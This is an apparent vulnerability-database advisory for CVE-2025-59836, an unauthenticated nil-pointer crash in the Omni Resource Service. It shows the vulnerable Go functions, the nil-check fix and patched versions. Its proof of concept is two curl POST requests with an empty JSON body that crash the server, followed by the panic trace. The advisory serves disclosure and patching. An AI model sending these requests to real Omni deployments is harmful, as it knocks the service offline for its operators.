CVE-2025-59836 is a medium-severity (CVSS 5.3) NULL Pointer Dereference vulnerability in github.com/siderolabs/omni. A fix is available for github.com/siderolabs/omni — see the affected versions and patch details below.
Omni is Vulnerable to DoS via Empty Create/Update Resource Requests
Exploitation Status
Proof-of-concept exploit code exists
- CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
- CISA assesses this as automatable — exploitation doesn’t require manual, per-target effort, which raises the odds of mass scanning and opportunistic attacks.
Exploitation and automatability from CISA’s SSVC triage for CVE-2025-59836.
EPSS Exploitation Probability
Probability of exploitation in the next 30 days, from FIRST.org EPSS.
How urgent is this, really
Where this sits among everything scored
Real-World Exposure
github.com/siderolabs/omni🐹github.com/siderolabs/omniReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.
Description
Summary
A nil pointer dereference vulnerability in the Omni Resource Service allows unauthenticated users to cause a server panic and denial of service by sending empty create/update resource requests through the API endpoints.
Details
The vulnerability exists in the isSensitiveSpec function which calls grpcomni.CreateResource without checking if the resource's metadata field is nil. When a resource is created with an empty Metadata field, the CreateResource function attempts to access resource.Metadata.Version causing a segmentation fault.
Vulnerable Code
The isSensitiveSpec function in /src/internal/backend/server.go:
func isSensitiveSpec(resource *resapi.Resource) bool {
res, err := grpcomni.CreateResource(resource) // No nil check on resource.Metadata
if err != nil {
return false
}
// ... rest of function
}
The CreateResource function expects resource.Metadata to be non-nil:
func CreateResource(resource *resources.Resource) (cosiresource.Resource, error) {
if resource.Metadata.Version == "" { // PANIC: nil pointer dereference
resource.Metadata.Version = "1"
}
// ... rest of function
}
The UpdateResource function has the same issue - it also calls CreateResource internally and expects resource.Metadata to be non-nil:
func (s *ResourceServer) Update(ctx context.Context, in *resapi.UpdateRequest) (*resapi.UpdateResponse, error) {
// ... validation code ...
obj, err := CreateResource(in.Resource) // Same vulnerability here
if err != nil {
return nil, err
}
// ... rest of function
}
Affected Endpoints
resourceServerCreate- Create Resource API endpointresourceServerUpdate- Update Resource API endpoint
Both endpoints call isSensitiveSpec which triggers the vulnerability when processing empty resources.
PoC
Send empty resource requests to the affected API endpoints:
# Create endpoint
curl -X POST "https://your-omni-instance/api/omni.resources.ResourceService/Create" \
-H "Content-Type: application/json" \
-d '{}'
# Update endpoint
curl -X POST "https://your-omni-instance/api/omni.resources.ResourceService/Update" \
-H "Content-Type: application/json" \
-d '{}'
Expected Result: Server panic with segmentation fault:
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0x293d970]
goroutine 3305 [running]:
github.com/siderolabs/omni/internal/backend/grpc.CreateResource(0x3495420?)
/src/internal/backend/grpc/resource.go:364 +0x20
Impact
- Vulnerability Type: Denial of Service (DoS)
- Severity: High - Complete API server crash requiring manual restart if no restart policy is applied.
- Authentication: None required (unauthenticated)
- Complexity: Low (simple HTTP request)
Mitigation
Add nil checks in the isSensitiveSpec function:
func isSensitiveSpec(resource *resapi.Resource) bool {
if resource == nil || resource.Metadata == nil {
return false
}
res, err := grpcomni.CreateResource(resource)
if err != nil {
return false
}
// ... rest of function
}
Credits
- @1c3t0rm
- @nicomda
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐹Go | github.com/siderolabs/omni | ≥ 1.1.0-beta.0&&< 1.1.5 | 1.1.5go get github.com/siderolabs/omni@v1.1.5 |
| 🐹Go | github.com/siderolabs/omni | all versions | 1.0.2go get github.com/siderolabs/omni@v1.0.2 |
Affected Products
omnisiderolabsDetection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/siderolabs/omni, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update github.com/siderolabs/omni to 1.1.5 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2025-59836 is resolved across your whole dependency graph.
Workarounds
Cap what an attacker can consume: apply request size, rate and timeout limits in front of the affected component, and run it with memory and CPU limits so exhaustion degrades one worker rather than the whole service.
Frequently Asked Questions
Is CVE-2025-59836 in your dependencies?
Find it across Go, including transitive dependencies.